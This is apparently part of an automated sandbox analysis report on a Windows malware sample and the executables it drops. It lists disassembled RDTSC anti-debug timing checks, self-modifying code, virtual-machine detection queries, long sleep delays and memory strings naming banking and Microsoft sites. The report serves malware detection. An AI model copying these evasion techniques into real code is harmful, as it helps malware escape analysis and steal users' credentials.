                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450058 second address: 545009F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F0550D663D0h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 jmp 00007F0550D663CEh 0x00000017 mov ecx, 2CFD4491h 0x0000001c popad 0x0000001d and esp, FFFFFFF0h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov al, dh 0x00000025 popad 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 545009F second address: 54500CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 44h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0550733D17h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54500CD second address: 54500D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54500D3 second address: 54500D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54500D7 second address: 54501B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d jmp 00007F0550D663D4h 0x00000012 pushfd 0x00000013 jmp 00007F0550D663D2h 0x00000018 add ecx, 74361D08h 0x0000001e jmp 00007F0550D663CBh 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 jmp 00007F0550D663CFh 0x0000002c popad 0x0000002d xchg eax, ebx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F0550D663D0h 0x00000035 sbb esi, 67BAD298h 0x0000003b jmp 00007F0550D663CBh 0x00000040 popfd 0x00000041 pushfd 0x00000042 jmp 00007F0550D663D8h 0x00000047 and ax, 7CF8h 0x0000004c jmp 00007F0550D663CBh 0x00000051 popfd 0x00000052 popad 0x00000053 xchg eax, esi 0x00000054 jmp 00007F0550D663D6h 0x00000059 push eax 0x0000005a jmp 00007F0550D663CBh 0x0000005f xchg eax, esi 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54501B0 second address: 54501B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54501B4 second address: 54501B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54501B8 second address: 54501BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54501BE second address: 54501E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0550D663D7h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54501E6 second address: 5450221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 pushfd 0x00000007 jmp 00007F0550733D10h 0x0000000c add ax, 3B48h 0x00000011 jmp 00007F0550733D0Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0550733D0Bh 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450221 second address: 545023E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 545023E second address: 5450285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 call 00007F0550733D13h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, edi 0x00000010 jmp 00007F0550733D0Fh 0x00000015 mov edi, dword ptr [ebp+08h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0550733D15h 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450285 second address: 5450295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0550D663CCh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450295 second address: 5450329 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+24h], 00000000h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F0550733D18h 0x00000017 xor cx, E728h 0x0000001c jmp 00007F0550733D0Bh 0x00000021 popfd 0x00000022 popad 0x00000023 lock bts dword ptr [edi], 00000000h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F0550733D0Bh 0x00000031 add esi, 1F83B06Eh 0x00000037 jmp 00007F0550733D19h 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007F0550733D10h 0x00000043 xor esi, 1CD9FBE8h 0x00000049 jmp 00007F0550733D0Bh 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450329 second address: 5450371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 pushfd 0x00000007 jmp 00007F0550D663D0h 0x0000000c add si, 8E48h 0x00000011 jmp 00007F0550D663CBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jc 00007F05C2A584A5h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F0550D663D5h 0x00000027 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5450371 second address: 54503D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b jmp 00007F0550733D0Ch 0x00000010 mov eax, 77F9AAA1h 0x00000015 popad 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c pushfd 0x0000001d jmp 00007F0550733D0Fh 0x00000022 sub eax, 763B134Eh 0x00000028 jmp 00007F0550733D19h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 54503D1 second address: 5450439 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push ebx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b jmp 00007F0550D663D5h 0x00000010 mov esp, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F0550D663D3h 0x0000001b add ah, FFFFFFBEh 0x0000001e jmp 00007F0550D663D9h 0x00000023 popfd 0x00000024 call 00007F0550D663D0h 0x00000029 pop eax 0x0000002a popad 0x0000002b rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5440ADE second address: 5440AE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5440AE4 second address: 5440AE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5440AE8 second address: 5440B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cx, dx 0x0000000f pushfd 0x00000010 jmp 00007F0550733D15h 0x00000015 and ax, 5C36h 0x0000001a jmp 00007F0550733D11h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5440B25 second address: 5440B2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5440B2B second address: 5440B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0550733D12h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: 5440B4A second address: 5440B5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0550D663CEh 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\10190860101\8sb9w_003.exeSpecial instruction interceptor: First address: 640361 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeSpecial instruction interceptor: First address: 1403EC53C instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSpecial instruction interceptor: First address: C5792C instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSpecial instruction interceptor: First address: C56809 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSpecial instruction interceptor: First address: C6B611 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeSpecial instruction interceptor: First address: AB2B42 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 43792C instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 436809 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 44B611 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSpecial instruction interceptor: First address: 292B42 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSpecial instruction interceptor: First address: 831206 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeSpecial instruction interceptor: First address: 8C0C9D instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeCode function: 0_2_05470A9C rdtsc 0_2_05470A9C
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1599Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1621Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1007Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow / User API: threadDelayed 1017Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeWindow / User API: threadDelayed 1656Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6237
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3521
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5977
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3731
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7455
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1994
                          Source: C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exeDropped PE file which has not been started: C:\Windows\Temp\gvh50gjo_3616.sysJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msvcr80.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msvcp80.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\altuninstall_test\msvcp80.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\ShortcutTaskAgent.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\altuninstall_test\msvcr80.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8000Thread sleep count: 60 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8000Thread sleep time: -120060s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8004Thread sleep count: 50 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 8004Thread sleep time: -100050s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7964Thread sleep count: 266 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7964Thread sleep time: -7980000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7996Thread sleep count: 1599 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7996Thread sleep time: -3199599s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7988Thread sleep count: 1621 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7988Thread sleep time: -3243621s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7980Thread sleep count: 1007 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7980Thread sleep time: -2015007s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7988Thread sleep count: 1017 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7988Thread sleep time: -2035017s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7996Thread sleep count: 86 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7996Thread sleep time: -172086s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exe TID: 8172Thread sleep time: -32016s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exe TID: 6976Thread sleep time: -180000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe TID: 5824Thread sleep time: -180000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exe TID: 2792Thread sleep count: 1656 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exe TID: 5996Thread sleep time: -180000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 3272Thread sleep time: -90000s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1292Thread sleep count: 6237 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3508Thread sleep count: 3521 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 472Thread sleep time: -8301034833169293s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe TID: 3008Thread sleep time: -210000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exe TID: 3012Thread sleep count: 143 > 30
                          Source: C:\Users\user\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exe TID: 4192Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4916Thread sleep time: -7378697629483816s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5696Thread sleep time: -7378697629483816s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\10191490101\EZs3CZC.exe TID: 5796Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00C2FCDE FindFirstFileExW,15_2_00C2FCDE
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 15_2_00C2FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_00C2FD8F
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C2FCDE FindFirstFileExW,17_2_00C2FCDE
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeCode function: 17_2_00C2FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_00C2FD8F
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: rapes.exe, rapes.exe, 0000000B.00000002.2466924239.0000000000418000.00000040.00000001.01000000.0000000A.sdmp, s7MG2VL.exe, s7MG2VL.exe, 0000000C.00000002.2091813340.0000000000813000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                          Source: svchost.exe, 0000001F.00000002.2475234152.000001DBE2877000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                          Source: eAzoDbY.exe, 00000019.00000003.2104615642.0000000001528000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2000519254.000000000152F000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000002.2234976665.0000000001528000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2145654983.0000000001528000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWs
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                          Source: rapes.exe, 0000000B.00000002.2476906113.0000000001347000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2476906113.0000000001379000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.1981626588.0000000001384000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2089689153.0000000001384000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2006495167.0000000001384000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2059422413.0000000001384000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2005615609.0000000001384000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000002.2092842281.0000000001384000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2090492021.0000000001384000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000002.2470317252.000000000102C000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2019127027.000000000105D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.000000000337A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                          Source: 8sb9w_003.exe, 0000001C.00000002.2039794527.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, ps.exe, 00000026.00000002.2199120701.00000000004B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                          Source: s7MG2VL.exe, 0000000C.00000003.2089689153.0000000001349000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000002.2092658472.0000000001349000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP49
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                          Source: yo7qmvz.exe, 00000023.00000003.2174563530.0000000003374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
